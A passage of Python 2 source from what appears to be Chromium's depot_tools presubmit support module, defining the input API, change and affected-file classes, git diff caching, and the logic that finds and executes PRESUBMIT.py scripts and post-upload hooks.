PostUploadHook. Args: cl: The git_cl.Changelist object. bots_to_include: A list of strings of bots to include, in the form "master:slave". message: A message to be printed in the case that CQ_INCLUDE_TRYBOTS was updated. 
""" description = cl.GetDescription(force=True) include_re = re.compile(r'^CQ_INCLUDE_TRYBOTS=(.*)$', re.M | re.I) prior_bots = [] if cl.IsGerrit(): trybot_footers = git_footers.parse_footers(description).get( git_footers.normalize_name('Cq-Include-Trybots'), []) for f in trybot_footers: prior_bots += [b.strip() for b in f.split(';') if b.strip()] else: trybot_tags = include_re.finditer(description) for t in trybot_tags: prior_bots += [b.strip() for b in t.group(1).split(';') if b.strip()] if set(prior_bots) >= set(bots_to_include): return [] all_bots = ';'.join(sorted(set(prior_bots) | set(bots_to_include))) if cl.IsGerrit(): description = git_footers.remove_footer( description, 'Cq-Include-Trybots') description = git_footers.add_footer( description, 'Cq-Include-Trybots', all_bots, before_keys=['Change-Id']) else: new_include_trybots = 'CQ_INCLUDE_TRYBOTS=%s' % all_bots m = include_re.search(description) if m: description = include_re.sub(new_include_trybots, description) else: description = '%s\n%s\n' % (description, new_include_trybots) cl.UpdateDescription(description, force=True) return [self.PresubmitNotifyResult(message)] class InputApi(object): """An instance of this object is passed to presubmit scripts so they can know stuff about the change they're looking at. """ # Method could be a function # pylint: disable=no-self-use # File extensions that are considered source files from a style guide # perspective. Don't modify this list from a presubmit script! # # Files without an extension aren't included in the list. If you want to # filter them as source files, add r"(^|.*?[\\\/])[^.]+$" to the white list. # Note that ALL CAPS files are black listed in DEFAULT_BLACK_LIST below. DEFAULT_WHITE_LIST = ( # C++ and friends r".+\.c$", r".+\.cc$", r".+\.cpp$", r".+\.h$", r".+\.m$", r".+\.mm$", r".+\.inl$", r".+\.asm$", r".+\.hxx$", r".+\.hpp$", r".+\.s$", r".+\.S$", # Scripts r".+\.js$", r".+\.py$", r".+\.sh$", r".+\.rb$", r".+\.pl$", r".+\.pm$", # Other r".+\.java$", r".+\.mk$", r".+\.am$", r".+\.css$" ) # Path regexp that should be excluded from being considered containing source # files. Don't modify this list from a presubmit script! DEFAULT_BLACK_LIST = ( r"testing_support[\\\/]google_appengine[\\\/].*", r".*\bexperimental[\\\/].*", # Exclude third_party/.* but NOT third_party/WebKit (crbug.com/539768). r".*\bthird_party[\\\/](?!WebKit[\\\/]).*", # Output directories (just in case) r".*\bDebug[\\\/].*", r".*\bRelease[\\\/].*", r".*\bxcodebuild[\\\/].*", r".*\bout[\\\/].*", # All caps files like README and LICENCE. r".*\b[A-Z0-9_]{2,}$", # SCM (can happen in dual SCM configuration). (Slightly over aggressive) r"(|.*[\\\/])\.git[\\\/].*", r"(|.*[\\\/])\.svn[\\\/].*", # There is no point in processing a patch file. r".+\.diff$", r".+\.patch$", ) def __init__(self, change, presubmit_path, is_committing, verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False): """Builds an InputApi object. Args: change: A presubmit.Change object. presubmit_path: The path to the presubmit script being processed. is_committing: True if the change is about to be committed. gerrit_obj: provides basic Gerrit codereview functionality. dry_run: if true, some Checks will be skipped. parallel: if true, all tests reported via input_api.RunTests for all PRESUBMIT files will be run in parallel. """ # Version number of the presubmit_support script. 
self.version = [int(x) for x in __version__.split('.')] self.change = change self.is_committing = is_committing self.gerrit = gerrit_obj self.dry_run = dry_run self.parallel = parallel self.thread_pool = thread_pool or ThreadPool() # We expose various modules and functions as attributes of the input_api # so that presubmit scripts don't have to import them. self.ast = ast self.basename = os.path.basename self.cPickle = cPickle self.cpplint = cpplint self.cStringIO = cStringIO self.fnmatch = fnmatch self.glob = glob.glob self.json = json self.logging = logging.getLogger('PRESUBMIT') self.os_listdir = os.listdir self.os_walk = os.walk self.os_path = os.path self.os_stat = os.stat self.pickle = pickle self.marshal = marshal self.re = re self.subprocess = subprocess self.tempfile = tempfile self.time = time self.traceback = traceback self.unittest = unittest self.urllib2 = urllib2 self.is_windows = sys.platform == 'win32' # Set python_executable to 'python'. This is interpreted in CallCommand to # convert to vpython in order to allow scripts in other repos (e.g. src.git) # to automatically pick up that repo's .vpython file, instead of inheriting # the one in depot_tools. self.python_executable = 'python' self.environ = os.environ # InputApi.platform is the platform you're currently running on. self.platform = sys.platform self.cpu_count = multiprocessing.cpu_count() # The local path of the currently-being-processed presubmit script. self._current_presubmit_path = os.path.dirname(presubmit_path) # We carry the canned checks so presubmit scripts can easily use them. self.canned_checks = presubmit_canned_checks # Temporary files we must manually remove at the end of a run. self._named_temporary_files = [] # TODO(dpranke): figure out a list of all approved owners for a repo # in order to be able to handle wildcard OWNERS files? self.owners_db = owners.Database(change.RepositoryRoot(), fopen=file, os_path=self.os_path) self.owners_finder = owners_finder.OwnersFinder self.verbose = verbose self.Command = CommandData # Replace <hash_map> and <hash_set> as headers that need to be included # with "base/containers/hash_tables.h" instead. # Access to a protected member _XX of a client class # pylint: disable=protected-access self.cpplint._re_pattern_templates = [ (a, b, 'base/containers/hash_tables.h') if header in ('<hash_map>', '<hash_set>') else (a, b, header) for (a, b, header) in cpplint._re_pattern_templates ] def PresubmitLocalPath(self): """Returns the local path of the presubmit script currently being run. This is useful if you don't want to hard-code absolute paths in the presubmit script. For example, It can be used to find another file relative to the PRESUBMIT.py script, so the whole tree can be branched and the presubmit script still works, without editing its content. """ return self._current_presubmit_path def AffectedFiles(self, include_deletes=True, file_filter=None): """Same as input_api.change.AffectedFiles() except only lists files (and optionally directories) in the same directory as the current presubmit script, or subdirectories thereof. 
""" dir_with_slash = normpath("%s/" % self.PresubmitLocalPath()) if len(dir_with_slash) == 1: dir_with_slash = '' return filter( lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash), self.change.AffectedFiles(include_deletes, file_filter)) def LocalPaths(self): """Returns local paths of input_api.AffectedFiles().""" paths = [af.LocalPath() for af in self.AffectedFiles()] logging.debug("LocalPaths: %s", paths) return paths def AbsoluteLocalPaths(self): """Returns absolute local paths of input_api.AffectedFiles().""" return [af.AbsoluteLocalPath() for af in self.AffectedFiles()] def AffectedTestableFiles(self, include_deletes=None, **kwargs): """Same as input_api.change.AffectedTestableFiles() except only lists files in the same directory as the current presubmit script, or subdirectories thereof. """ if include_deletes is not None: warn("AffectedTestableFiles(include_deletes=%s)" " is deprecated and ignored" % str(include_deletes), category=DeprecationWarning, stacklevel=2) return filter(lambda x: x.IsTestableFile(), self.AffectedFiles(include_deletes=False, **kwargs)) def AffectedTextFiles(self, include_deletes=None): """An alias to AffectedTestableFiles for backwards compatibility.""" return self.AffectedTestableFiles(include_deletes=include_deletes) def FilterSourceFile(self, affected_file, white_list=None, black_list=None): """Filters out files that aren't considered "source file". If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST and InputApi.DEFAULT_BLACK_LIST is used respectively. The lists will be compiled as regular expression and AffectedFile.LocalPath() needs to pass both list. Note: Copy-paste this function to suit your needs or use a lambda function. """ def Find(affected_file, items): local_path = affected_file.LocalPath() for item in items: if self.re.match(item, local_path): return True return False return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST)) def AffectedSourceFiles(self, source_file): """Filter the list of AffectedTestableFiles by the function source_file. If source_file is None, InputApi.FilterSourceFile() is used. """ if not source_file: source_file = self.FilterSourceFile return filter(source_file, self.AffectedTestableFiles()) def RightHandSideLines(self, source_file_filter=None): """An iterator over all text lines in "new" version of changed files. Only lists lines from new or modified text files in the change that are contained by the directory of the currently executing presubmit script. This is useful for doing line-by-line regex checks, like checking for trailing whitespace. Yields: a 3 tuple: the AffectedFile instance of the current file; integer line number (1-based); and the contents of the line as a string. Note: The carriage return (LF or CR) is stripped off. """ files = self.AffectedSourceFiles(source_file_filter) return _RightHandSideLinesImpl(files) def ReadFile(self, file_item, mode='r'): """Reads an arbitrary file. Deny reading anything outside the repository. """ if isinstance(file_item, AffectedFile): file_item = file_item.AbsoluteLocalPath() if not file_item.startswith(self.change.RepositoryRoot()): raise IOError('Access outside the repository root is denied.') return gclient_utils.FileRead(file_item, mode) def CreateTemporaryFile(self, **kwargs): """Returns a named temporary file that must be removed with a call to RemoveTemporaryFiles(). 
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(), except for |delete|, which is always set to False. Presubmit checks that need to create a temporary file and pass it for reading should use this function instead of NamedTemporaryFile(), as Windows fails to open a file that is already open for writing. with input_api.CreateTemporaryFile() as f: f.write('xyz') f.close() input_api.subprocess.check_output(['script-that', '--reads-from', f.name]) Note that callers of CreateTemporaryFile() should not worry about removing any temporary file; this is done transparently by the presubmit handling code. """ if 'delete' in kwargs: # Prevent users from passing |delete|; we take care of file deletion # ourselves and this prevents unintuitive error messages when we pass # delete=False and 'delete' is also in kwargs. raise TypeError('CreateTemporaryFile() does not take a "delete" ' 'argument, file deletion is handled automatically by ' 'the same presubmit_support code that creates InputApi ' 'objects.') temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs) self._named_temporary_files.append(temp_file.name) return temp_file @property def tbr(self): """Returns if a change is TBR'ed.""" return 'TBR' in self.change.tags or self.change.TBRsFromDescription() def RunTests(self, tests_mix, parallel=True): # RunTests doesn't actually run tests. It adds them to a ThreadPool that # will run all tests once all PRESUBMIT files are processed. tests = [] msgs = [] for t in tests_mix: if isinstance(t, OutputApi.PresubmitResult) and t: msgs.append(t) else: assert issubclass(t.message, _PresubmitResult) tests.append(t) if self.verbose: t.info = _PresubmitNotifyResult t.kwargs['cwd'] = self.PresubmitLocalPath() self.thread_pool.AddTests(tests, parallel) if not self.parallel: msgs.extend(self.thread_pool.RunAsync()) return msgs class _DiffCache(object): """Caches diffs retrieved from a particular SCM.""" def __init__(self, upstream=None): """Stores the upstream revision against which all diffs will be computed.""" self._upstream = upstream def GetDiff(self, path, local_root): """Get the diff for a particular path.""" raise NotImplementedError() def GetOldContents(self, path, local_root): """Get the old version for a particular path.""" raise NotImplementedError() class _GitDiffCache(_DiffCache): """DiffCache implementation for git; gets all file diffs at once.""" def __init__(self, upstream): super(_GitDiffCache, self).__init__(upstream=upstream) self._diffs_by_file = None def GetDiff(self, path, local_root): if not self._diffs_by_file: # Compute a single diff for all files and parse the output; should # with git this is much faster than computing one diff for each file. diffs = {} # Don't specify any filenames below, because there are command line length # limits on some platforms and GenerateDiff would fail. unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True, branch=self._upstream) # This regex matches the path twice, separated by a space. Note that # filename itself may contain spaces. file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$') current_diff = [] keep_line_endings = True for x in unified_diff.splitlines(keep_line_endings): match = file_marker.match(x) if match: # Marks the start of a new per-file section. 
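          # A matching header repeats the same path twice, e.g. (hypothetical
          # file): "diff --git chrome/app/main.cc chrome/app/main.cc".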
diffs[match.group('filename')] = current_diff = [x] elif x.startswith('diff --git'): raise PresubmitFailure('Unexpected diff line: %s' % x) else: current_diff.append(x) self._diffs_by_file = dict( (normpath(path), ''.join(diff)) for path, diff in diffs.items()) if path not in self._diffs_by_file: raise PresubmitFailure( 'Unified diff did not contain entry for file %s' % path) return self._diffs_by_file[path] def GetOldContents(self, path, local_root): return scm.GIT.GetOldContents(local_root, path, branch=self._upstream) class AffectedFile(object): """Representation of a file in a change.""" DIFF_CACHE = _DiffCache # Method could be a function # pylint: disable=no-self-use def __init__(self, path, action, repository_root, diff_cache): self._path = path self._action = action self._local_root = repository_root self._is_directory = None self._cached_changed_contents = None self._cached_new_contents = None self._diff_cache = diff_cache logging.debug('%s(%s)', self.__class__.__name__, self._path) def LocalPath(self): """Returns the path of this file on the local disk relative to client root. This should be used for error messages but not for accessing files, because presubmit checks are run with CWD=PresubmitLocalPath() (which is often != client root). """ return normpath(self._path) def AbsoluteLocalPath(self): """Returns the absolute path of this file on the local disk. """ return os.path.abspath(os.path.join(self._local_root, self.LocalPath())) def Action(self): """Returns the action on this opened file, e.g. A, M, D, etc.""" return self._action def IsTestableFile(self): """Returns True if the file is a text file and not a binary file. Deleted files are not text file.""" raise NotImplementedError() # Implement when needed def IsTextFile(self): """An alias to IsTestableFile for backwards compatibility.""" return self.IsTestableFile() def OldContents(self): """Returns an iterator over the lines in the old version of file. The old version is the file before any modifications in the user's workspace, i.e. the "left hand side". Contents will be empty if the file is a directory or does not exist. Note: The carriage returns (LF or CR) are stripped off. """ return self._diff_cache.GetOldContents(self.LocalPath(), self._local_root).splitlines() def NewContents(self): """Returns an iterator over the lines in the new version of file. The new version is the file in the user's workspace, i.e. the "right hand side". Contents will be empty if the file is a directory or does not exist. Note: The carriage returns (LF or CR) are stripped off. """ if self._cached_new_contents is None: self._cached_new_contents = [] try: self._cached_new_contents = gclient_utils.FileRead( self.AbsoluteLocalPath(), 'rU').splitlines() except IOError: pass # File not found? That's fine; maybe it was deleted. return self._cached_new_contents[:] def ChangedContents(self): """Returns a list of tuples (line number, line text) of all new lines. 
This relies on the scm diff output describing each changed code section with a line of the form ^@@ <old line num>,<old size> <new line num>,<new size> @@$ """ if self._cached_changed_contents is not None: return self._cached_changed_contents[:] self._cached_changed_contents = [] line_num = 0 for line in self.GenerateScmDiff().splitlines(): m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line) if m: line_num = int(m.groups(1)[0]) continue if line.startswith('+') and not line.startswith('++'): self._cached_changed_contents.append((line_num, line[1:])) if not line.startswith('-'): line_num += 1 return self._cached_changed_contents[:] def __str__(self): return self.LocalPath() def GenerateScmDiff(self): return self._diff_cache.GetDiff(self.LocalPath(), self._local_root) class GitAffectedFile(AffectedFile): """Representation of a file in a change out of a git checkout.""" # Method 'NNN' is abstract in class 'NNN' but is not overridden # pylint: disable=abstract-method DIFF_CACHE = _GitDiffCache def __init__(self, *args, **kwargs): AffectedFile.__init__(self, *args, **kwargs) self._server_path = None self._is_testable_file = None def IsTestableFile(self): if self._is_testable_file is None: if self.Action() == 'D': # A deleted file is not testable. self._is_testable_file = False else: self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath()) return self._is_testable_file class Change(object): """Describe a change. Used directly by the presubmit scripts to query the current change being tested. Instance members: tags: Dictionary of KEY=VALUE pairs found in the change description. self.KEY: equivalent to tags['KEY'] """ _AFFECTED_FILES = AffectedFile # Matches key/value (or "tag") lines in changelist descriptions. TAG_LINE_RE = re.compile( '^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$') scm = '' def __init__( self, name, description, local_root, files, issue, patchset, author, upstream=None): if files is None: files = [] self._name = name # Convert root into an absolute path. self._local_root = os.path.abspath(local_root) self._upstream = upstream self.issue = issue self.patchset = patchset self.author_email = author self._full_description = '' self.tags = {} self._description_without_tags = '' self.SetDescriptionText(description) assert all( (isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream) self._affected_files = [ self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache) for action, path in files ] def Name(self): """Returns the change name.""" return self._name def DescriptionText(self): """Returns the user-entered changelist description, minus tags. Any line in the user-provided description starting with e.g. "FOO=" (whitespace permitted before and around) is considered a tag line. Such lines are stripped out of the description this function returns. """ return self._description_without_tags def FullDescriptionText(self): """Returns the complete changelist description including tags.""" return self._full_description def SetDescriptionText(self, description): """Sets the full description text (including tags) to |description|. Also updates the list of tags.""" self._full_description = description # From the description text, build up a dictionary of key/value pairs # plus the description minus all key/value or "tag" lines. 
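    # A "tag" line has the form KEY=value, e.g. "BUG=123456" or
    # "TBR=reviewer@example.org" (hypothetical values); all other lines stay
    # in the plain description.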
description_without_tags = [] self.tags = {} for line in self._full_description.splitlines(): m = self.TAG_LINE_RE.match(line) if m: self.tags[m.group('key')] = m.group('value') else: description_without_tags.append(line) # Change back to text and remove whitespace at end. self._description_without_tags = ( '\n'.join(description_without_tags).rstrip()) def RepositoryRoot(self): """Returns the repository (checkout) root directory for this change, as an absolute path. """ return self._local_root def __getattr__(self, attr): """Return tags directly as attributes on the object.""" if not re.match(r"^[A-Z_]*$", attr): raise AttributeError(self, attr) return self.tags.get(attr) def BugsFromDescription(self): """Returns all bugs referenced in the commit description.""" tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()] footers = git_footers.parse_footers(self._full_description).get('Bug', []) return sorted(set(tags + footers)) def ReviewersFromDescription(self): """Returns all reviewers listed in the commit description.""" # We don't support a "R:" git-footer for reviewers; that is in metadata. tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()] return sorted(set(tags)) def TBRsFromDescription(self): """Returns all TBR reviewers listed in the commit description.""" tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()] # TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically # determined by self-CR+1s. footers = git_footers.parse_footers(self._full_description).get('Tbr', []) return sorted(set(tags + footers)) # TODO(agable): Delete these once we're sure they're unused. @property def BUG(self): return ','.join(self.BugsFromDescription()) @property def R(self): return ','.join(self.ReviewersFromDescription()) @property def TBR(self): return ','.join(self.TBRsFromDescription()) def AllFiles(self, root=None): """List all files under source control in the repo.""" raise NotImplementedError() def AffectedFiles(self, include_deletes=True, file_filter=None): """Returns a list of AffectedFile instances for all files in the change. Args: include_deletes: If false, deleted files will be filtered out. file_filter: An additional filter to apply. Returns: [AffectedFile(path, action), AffectedFile(path, action)] """ affected = filter(file_filter, self._affected_files) if include_deletes: return affected return filter(lambda x: x.Action() != 'D', affected) def AffectedTestableFiles(self, include_deletes=None, **kwargs): """Return a list of the existing text files in a change.""" if include_deletes is not None: warn("AffectedTeestableFiles(include_deletes=%s)" " is deprecated and ignored" % str(include_deletes), category=DeprecationWarning, stacklevel=2) return filter(lambda x: x.IsTestableFile(), self.AffectedFiles(include_deletes=False, **kwargs)) def AffectedTextFiles(self, include_deletes=None): """An alias to AffectedTestableFiles for backwards compatibility.""" return self.AffectedTestableFiles(include_deletes=include_deletes) def LocalPaths(self): """Convenience function.""" return [af.LocalPath() for af in self.AffectedFiles()] def AbsoluteLocalPaths(self): """Convenience function.""" return [af.AbsoluteLocalPath() for af in self.AffectedFiles()] def RightHandSideLines(self): """An iterator over all text lines in "new" version of changed files. Lists lines from new or modified text files in the change. This is useful for doing line-by-line regex checks, like checking for trailing whitespace. 
Yields: a 3 tuple: the AffectedFile instance of the current file; integer line number (1-based); and the contents of the line as a string. """ return _RightHandSideLinesImpl( x for x in self.AffectedFiles(include_deletes=False) if x.IsTestableFile()) def OriginalOwnersFiles(self): """A map from path names of affected OWNERS files to their old content.""" def owners_file_filter(f): return 'OWNERS' in os.path.split(f.LocalPath())[1] files = self.AffectedFiles(file_filter=owners_file_filter) return dict([(f.LocalPath(), f.OldContents()) for f in files]) class GitChange(Change): _AFFECTED_FILES = GitAffectedFile scm = 'git' def AllFiles(self, root=None): """List all files under source control in the repo.""" root = root or self.RepositoryRoot() return subprocess.check_output( ['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'], cwd=root).splitlines() def ListRelevantPresubmitFiles(files, root): """Finds all presubmit files that apply to a given set of source files. If inherit-review-settings-ok is present right under root, looks for PRESUBMIT.py in directories enclosing root. Args: files: An iterable container containing file paths. root: Path where to stop searching. Return: List of absolute paths of the existing PRESUBMIT.py scripts. """ files = [normpath(os.path.join(root, f)) for f in files] # List all the individual directories containing files. directories = set([os.path.dirname(f) for f in files]) # Ignore root if inherit-review-settings-ok is present. if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')): root = None # Collect all unique directories that may contain PRESUBMIT.py. candidates = set() for directory in directories: while True: if directory in candidates: break candidates.add(directory) if directory == root: break parent_dir = os.path.dirname(directory) if parent_dir == directory: # We hit the system root directory. break directory = parent_dir # Look for PRESUBMIT.py in all candidate directories. results = [] for directory in sorted(list(candidates)): try: for f in os.listdir(directory): p = os.path.join(directory, f) if os.path.isfile(p) and re.match( r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'): results.append(p) except OSError: pass logging.debug('Presubmit files: %s', ','.join(results)) return results class GetTryMastersExecuter(object): @staticmethod def ExecPresubmitScript(script_text, presubmit_path, project, change): """Executes GetPreferredTryMasters() from a single presubmit script. Args: script_text: The text of the presubmit script. presubmit_path: Project script to run. project: Project name to pass to presubmit script for bot selection. Return: A map of try masters to map of builders to set of tests. """ context = {} try: exec script_text in context except Exception, e: raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e)) function_name = 'GetPreferredTryMasters' if function_name not in context: return {} get_preferred_try_masters = context[function_name] if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2: raise PresubmitFailure( 'Expected function "GetPreferredTryMasters" to take two arguments.') return get_preferred_try_masters(project, change) class GetPostUploadExecuter(object): @staticmethod def ExecPresubmitScript(script_text, presubmit_path, cl, change): """Executes PostUploadHook() from a single presubmit script. Args: script_text: The text of the presubmit script. presubmit_path: Project script to run. cl: The Changelist object. change: The Change object. 
Return: A list of results objects. """ context = {} try: exec script_text in context except Exception, e: raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e)) function_name = 'PostUploadHook' if function_name not in context: return {} post_upload_hook = context[function_name] if not len(inspect.getargspec(post_upload_hook)[0]) == 3: raise PresubmitFailure( 'Expected function "PostUploadHook" to take three arguments.') return post_upload_hook(cl, change, OutputApi(False)) def _MergeMasters(masters1, masters2): """Merges two master maps. Merges also the tests of each builder.""" result = {} for (master, builders) in itertools.chain(masters1.iteritems(), masters2.iteritems()): new_builders = result.setdefault(master, {}) for (builder, tests) in builders.iteritems(): new_builders.setdefault(builder, set([])).update(tests) return result def DoGetTryMasters(change, changed_files, repository_root, default_presubmit, project, verbose, output_stream): """Get the list of try masters from the presubmit scripts. Args: changed_files: List of modified files. repository_root: The repository root. default_presubmit: A default presubmit script to execute in any case. project: Optional name of a project used in selecting trybots. verbose: Prints debug info. output_stream: A stream to write debug output to. Return: Map of try masters to map of builders to set of tests. """ presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root) if not presubmit_files and verbose: output_stream.write("Warning, no PRESUBMIT.py found.\n") results = {} executer = GetTryMastersExecuter() if default_presubmit: if verbose: output_stream.write("Running default presubmit script.\n") fake_path = os.path.join(repository_root, 'PRESUBMIT.py') results = _MergeMasters(results, executer.ExecPresubmitScript( default_presubmit, fake_path, project, change)) for filename in presubmit_files: filename = os.path.abspath(filename) if verbose: output_stream.write("Running %s\n" % filename) # Accept CRLF presubmit script. presubmit_script = gclient_utils.FileRead(filename, 'rU') results = _MergeMasters(results, executer.ExecPresubmitScript( presubmit_script, filename, project, change)) # Make sets to lists again for later JSON serialization. for builders in results.itervalues(): for builder in builders: builders[builder] = list(builders[builder]) if results and verbose: output_stream.write('%s\n' % str(results)) return results def DoPostUploadExecuter(change, cl, repository_root, verbose, output_stream): """Execute the post upload hook. Args: change: The Change object. cl: The Changelist object. repository_root: The repository root. verbose: Prints debug info. output_stream: A stream to write debug output to. """ presubmit_files = ListRelevantPresubmitFiles( change.LocalPaths(), repository_root) if not presubmit_files and verbose: output_stream.write("Warning, no PRESUBMIT.py found.\n") results = [] executer = GetPostUploadExecuter() # The root presubmit file should be executed after the ones in subdirectories. # i.e. the specific post upload hooks should run before the general ones. # Thus, reverse the order provided by ListRelevantPresubmitFiles. presubmit_files.reverse() for filename in presubmit_files: filename = os.path.abspath(filename) if verbose: output_stream.write("Running %s\n" % filename) # Accept CRLF presubmit script. 
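    # ('rU' opens the file in universal-newline mode, so a script saved with
    # CRLF line endings still exec()s cleanly.)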
presubmit_script = gclient_utils.FileRead(filename, 'rU') results.extend(executer.ExecPresubmitScript( presubmit_script, filename, cl, change)) output_stream.write('\n') if results: output_stream.write('** Post Upload Hook Messages **\n') for result in results: result.handle(output_stream) output_stream.write('\n') return results class PresubmitExecuter(object): def __init__(self, change, committing, verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False): """ Args: change: The Change object. committing: True if 'git cl land' is running, False if 'git cl upload' is. gerrit_obj: provides basic Gerrit codereview functionality. dry_run: if true, some Checks will be skipped. parallel: if true, all tests reported via input_api.RunTests for all PRESUBMIT files will be run in parallel. """ self.change = change self.committing = committing self.gerrit = gerrit_obj self.verbose = verbose self.dry_run = dry_run self.more_cc = [] self.thread_pool = thread_pool self.parallel = parallel def ExecPresubmitScript(self, script_text, presubmit_path): """Executes a single presubmit script. Args: script_text: The text of the presubmit script. presubmit_path: The path to the presubmit file (this will be reported via input_api.PresubmitLocalPath()). Return: A list of result objects, empty if no problems. """ # Change to the presubmit file's directory to support local imports. main_path = os.getcwd() os.chdir(os.path.dirname(presubmit_path)) # Load the presubmit script into context. input_api = InputApi(self.change, presubmit_path, self.committing, self.verbose, gerrit_obj=self.gerrit, dry_run=self.dry_run, thread_pool=self.thread_pool, parallel=self.parallel) output_api = OutputApi(self.committing) context = {} try: exec script_text in context except Exception, e: raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e)) # These function names must change if we make substantial changes to # the presubmit API that are not backwards compatible. if self.committing: function_name = 'CheckChangeOnCommit' else: function_name = 'CheckChangeOnUpload' if function_name in context: try: context['__args'] = (input_api, output_api) logging.debug('Running %s in %s', function_name, presubmit_path) result = eval(function_name + '(*__args)', context) logging.debug('Running %s done.', function_name) self.more_cc.extend(output_api.more_cc) finally: map(os.remove, input_api._named_temporary_files) if not (isinstance(result, types.TupleType) or isinstance(result, types.ListType)): raise PresubmitFailure( 'Presubmit functions must return a tuple or list') for item in result: if not isinstance(item, OutputApi.PresubmitResult): raise PresubmitFailure( 'All presubmit results must be of types derived from ' 'output_api.PresubmitResult') else: result = () # no error since the script doesn't care about current event. # Return the process to the original working directory. os.chdir(main_path) return result def DoPresubmitChecks(change, committing, verbose, output_stream, input_stream, default_presubmit, may_prompt, gerrit_obj, dry_run=None, parallel=False): """Runs all presubmit checks that apply to the files in the change. This finds all PRESUBMIT.py files in directories enclosing the files in the change (up to the repository root) and calls the relevant entrypoint function depending on whether the change is being committed or uploaded. Prints errors, warnings and notifications. Prompts the user for warnings when needed. Args: change: The Change object. 
committing: True if 'git cl land' is running, False if 'git cl upload' is. verbose: Prints debug info. output_stream: A stream to write output from presubmit tests to. input_stream: A stream to read input from the user. default_presubmit: A default presubmit script to execute in any case. may_prompt: Enable (y/n) questions on warning or error. If False, any questions are answered with yes by default. gerrit_obj: provides basic Gerrit codereview functionality. dry_run: if true, some Checks will be skipped. parallel: if true, all tests specified by input_api.RunTests in all PRESUBMIT files will be run in parallel. Warning: If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream SHOULD be sys.stdin. Return: A PresubmitOutput object. Use output.should_continue() to figure out if there were errors or warnings and the caller should abort. """ old_environ = os.environ try: # Make sure python subprocesses won't generate .pyc files. os.environ = os.environ.copy() os.environ['PYTHONDONTWRITEBYTECODE'] = '1' output = PresubmitOutput(input_stream, output_stream) if committing: output.write("Running presubmit commit checks ...\n") else: output.write("Running presubmit upload checks ...\n") start_time = time.time() presubmit_files = ListRelevantPresubmitFiles( change.AbsoluteLocalPaths(), change.RepositoryRoot()) if not presubmit_files and verbose: output.write("Warning, no PRESUBMIT.py found.\n") results = [] thread_pool = ThreadPool() executer = PresubmitExecuter(change, committing, verbose, gerrit_obj, dry_run, thread_pool) if default_presubmit: if verbose: output.write("Running default presubmit script.\n") fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py') results += executer.ExecPresubmitScript(default_presubmit, fake_path) for filename in presubmit_files: filename = os.path.abspath(filename) if verbose: output.write("Running %s\n" % filename) # Accept CRLF presubmit script. presubmit_script = gclient_utils.FileRead(filename, 'rU') results += executer.ExecPresubmitScript(presubmit_script, filename) results += thread_pool.RunAsync() output.more_cc.extend(executer.more_cc) errors = [] notifications = [] warnings = [] for result in results: if result.fatal: errors.append(result) elif result.should_prompt: warnings.append(result) else: notifications.append(result) output.write('\n') for name, items in (('Messages', notifications), ('Warnings', warnings), ('ERRORS', errors)): if items: output.write('** Presubmit %s **\n' % name) for item in items: item.handle(output) output.write('\n') total_time = time.time() - start_time if total_time > 1.0: output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time) if errors: output.fail() elif warnings: output.write('There were presubmit warnings. ') if may_prompt: output.prompt_yes_no('Are you sure you wish to continue? (y/N): ') else: output.write('Presubmit checks passed.\n') global _ASKED_FOR_FEEDBACK # Ask for feedback one time out of 5. if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK): output.write( 'Was the presubmit check useful? 
If not, run "git cl presubmit -v"\n' 'to figure out which PRESUBMIT.py was run, then run git blame\n' 'on the file to figure out who to ask for help.\n') _ASKED_FOR_FEEDBACK = True return output finally: os.environ = old_environ def ScanSubDirs(mask, recursive): if not recursive: return [x for x in glob.glob(mask) if x not in ('.svn', '.git')] results = [] for root, dirs, files in os.walk('.'): if '.svn' in dirs: dirs.remove('.svn') if '.git' in dirs: dirs.remove('.git') for name in files: if fnmatch.fnmatch(name, mask): results.append(os.path.join(root, name)) return results def ParseFiles(args, recursive): logging.debug('Searching for %s', args) files = [] for arg in args: files.extend([('M', f) for f in ScanSubDirs(arg, recursive)]) return files def load_files(options, args): """Tries to determine the SCM.""" files = [] if args: files = ParseFiles(args, options.recursive) change_scm = scm.determine_scm(options.root) if change_scm == 'git': change_class = GitChange upstream = options.upstream or None if not files: files = scm.GIT.CaptureStatus([], options.root, upstream) else: logging.info('Doesn\'t seem under source control. Got %d files', len(args)) if not files: return None, None change_class = Change return change_class, files @contextlib.contextmanager def canned_check_filter(method_names): filtered = {} try: for method_name in method_names: if not hasattr(presubmit_canned_checks, method_name): logging.warn('Skipping unknown "canned" check %s' % method_name) continue filtered[method_name] = getattr(presubmit_canned_checks, method_name) setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: []) yield finally: for name, method in filtered.iteritems(): 